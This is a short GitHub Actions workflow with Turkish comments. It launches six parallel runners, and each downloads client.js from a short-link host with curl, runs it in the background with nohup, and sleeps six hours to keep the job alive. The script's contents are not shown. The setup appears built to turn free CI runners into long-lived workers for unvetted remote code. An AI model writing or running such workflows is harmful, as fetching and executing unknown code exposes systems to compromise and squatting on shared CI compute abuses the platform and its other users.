name: Run Node.js Script on Multiple Machines

on:
  workflow_dispatch:

jobs:
  run-node:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node_id: [1, 2, 3, 4, 5, 6] # Buraya istediğin sayıda ekle
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client_${{ matrix.node_id }}.log 2>&1 &
      - run: sleep 21600 # 6 saat
